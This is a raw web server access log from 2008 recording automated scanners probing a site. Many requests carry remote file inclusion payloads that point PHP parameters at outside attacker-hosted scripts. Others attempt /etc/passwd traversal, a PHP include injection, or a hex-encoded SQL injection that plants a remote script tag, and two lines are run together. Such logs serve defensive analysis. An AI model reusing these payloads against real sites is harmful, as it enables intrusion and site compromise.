80.67.19.125 - - [18/Aug/2008:10:43:37 -0700] "GET //calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:10:43:37 -0700] "GET /logs//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:10:43:38 -0700] "GET //calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:10:43:38 -0700] "GET /logs//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:10:43:39 -0700] "GET /logs/access_080809.log//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [18/Aug/2008:10:43:40 -0700] "GET /logs/access_071226.log//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [18/Aug/2008:10:43:57 -0700] "GET /logs/access_080708.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:10:44:02 -0700] "GET /logs/access_080211.log//index.php?id=&page=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.204.239.150 - - [18/Aug/2008:10:44:28 -0700] "GET /logs/access_080312.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043women_fitness/us1:208.8371.204.239.150 - - [18/Aug/2008:10:44:28 -0700] "GET /logs/access_080312.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B404lingeriestoreusa/us2:72.200.101.192.223 - - [18/Aug/2008:10:44:38 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:44:41 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:10:44:41 -0700] "GET /logs/access_080530.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:10:44:49 -0700] "GET /logs/access_080809.log//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:10:45:32 -0700] "GET /logs//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:10:45:33 -0700] "GET //calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:45:57 -0700] "GET /logs/access_080730.log/htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:45:57 -0700] "GET /htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:45:58 -0700] "GET /logs/htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:45:59 -0700] "GET /logs/access_080626.log/htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.204.109.42 - - [18/Aug/2008:10:46:01 -0700] "GET /logs/access_080312.log/atom.php5?page=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.109.42 - - [18/Aug/2008:10:46:03 -0700] "GET /atom.php5?page=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.109.42 - - [18/Aug/2008:10:46:07 -0700] "GET /logs/atom.php5?page=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [18/Aug/2008:10:46:33 -0700] "GET /logs/access_080312.log/atom.php5?page=http://www.felixtur.com.br/principal/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [18/Aug/2008:10:46:34 -0700] "GET /atom.php5?page=http://www.felixtur.com.br/principal/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [18/Aug/2008:10:46:37 -0700] "GET /logs/atom.php5?page=http://www.felixtur.com.br/principal/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.109.42 - - [18/Aug/2008:10:46:53 -0700] "GET /logs/access_080404.log/atom.php5?page=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:10:47:00 -0700] "GET /logs/access_080626.log//modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:10:47:04 -0700] "GET /logs/access_080713.log//modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:47:33 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:47:33 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:47:33 -0700] "GET /logs/access_080808.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [18/Aug/2008:10:47:50 -0700] "GET /logs/access_080404.log/atom.php5?page=http://www.felixtur.com.br/principal/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:48:01 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:48:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:48:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.92 - - [18/Aug/2008:10:48:54 -0700] "GET /logs/access_080630.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [18/Aug/2008:10:49:08 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [18/Aug/2008:10:49:08 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:10:49:24 -0700] "GET /logs/access_080226.log/index.php?lang=&page=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:49:25 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:49:26 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:49:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:49:29 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:10:50:36 -0700] "GET /logs/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:10:50:36 -0700] "GET /logs/access_080308.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:10:50:38 -0700] "GET /logs/access_080404.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:10:50:39 -0700] "GET /index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 200 10956 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:10:50:49 -0700] "GET /logs/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:10:50:49 -0700] "GET /logs/access_080308.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:10:50:49 -0700] "GET /logs/access_080404.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:10:50:50 -0700] "GET /index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 200 10956 "-" "libwww-perl/5.79" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:50:58 -0700] "GET /logs/access_080308.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:50:58 -0700] "GET /logs/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:50:58 -0700] "GET /logs/access_080404.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:50:59 -0700] "GET /index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 200 10956 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:10:51:13 -0700] "GET /logs/access_080226.log//index.php?lang=en&cat=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:51:44 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:52:19 -0700] "GET /logs/access_080809.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:52:19 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:52:19 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.153.33.182 - - [18/Aug/2008:10:52:20 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://esmakoken.com/valeandart/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [18/Aug/2008:10:52:20 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://esmakoken.com/valeandart/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [18/Aug/2008:10:52:20 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://esmakoken.com/valeandart/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:10:52:39 -0700] "GET /logs/access_080625.log/index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:52:47 -0700] "GET /logs/access_080626.log%20/htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:52:48 -0700] "GET /logs/access_080606.log%20/htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:01 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:02 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:04 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:05 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:07 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:07 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:53:13 -0700] "GET /index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 200 10956 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:39 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:39 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:45 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:10:53:46 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:54:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:54:23 -0700] "GET /logs/access_080209.log/index.php?redir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:54:43 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:55:44 -0700] "GET /logs/access_080110.log/htmltonuke.php?filnavn=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:55:51 -0700] "GET /logs/access_080621.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:59:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:59:51 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:00:49 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:00:49 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:00:50 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:02:16 -0700] "GET /logs/access_080704.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:11:03:10 -0700] "GET /logs/access_080621.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.211.84 - - [18/Aug/2008:11:03:31 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.125.211.84 - - [18/Aug/2008:11:03:33 -0700] "GET //popup_window.php?site_isp_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [18/Aug/2008:11:04:06 -0700] "GET /logs/access_080713.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.17 - - [18/Aug/2008:11:04:06 -0700] "GET /head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.17 - - [18/Aug/2008:11:04:07 -0700] "GET /logs/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:11:04:29 -0700] "GET /logs/access_070911.log HTTP/1.0" 200 86699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.172.140.17 - - [18/Aug/2008:11:04:29 -0700] "GET /logs/access_080609.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:06:52 -0700] "GET /logs/access_080708.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:06:52 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:06:52 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:07:31 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:07:31 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:07:32 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:07:50 -0700] "GET /logs/access_080704.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.254.184.38 - - [18/Aug/2008:11:08:02 -0700] "GET /logs/access_080131.log/scanhttp://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:08:04 -0700] "GET /logs/scanhttp://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:08:05 -0700] "GET /logs/access_080409.log/scanhttp://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:08:05 -0700] "GET /scanhttp://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:11:08:07 -0700] "GET /logs/access_080607.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:11:08:21 -0700] "GET /logs/access_080209.log//index.php?p=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:11:08:22 -0700] "GET /logs//index.php?p=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:11:08:24 -0700] "GET //index.php?p=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 200 10989 "-" "libwww-perl/5.805" "www.dmulk.com"
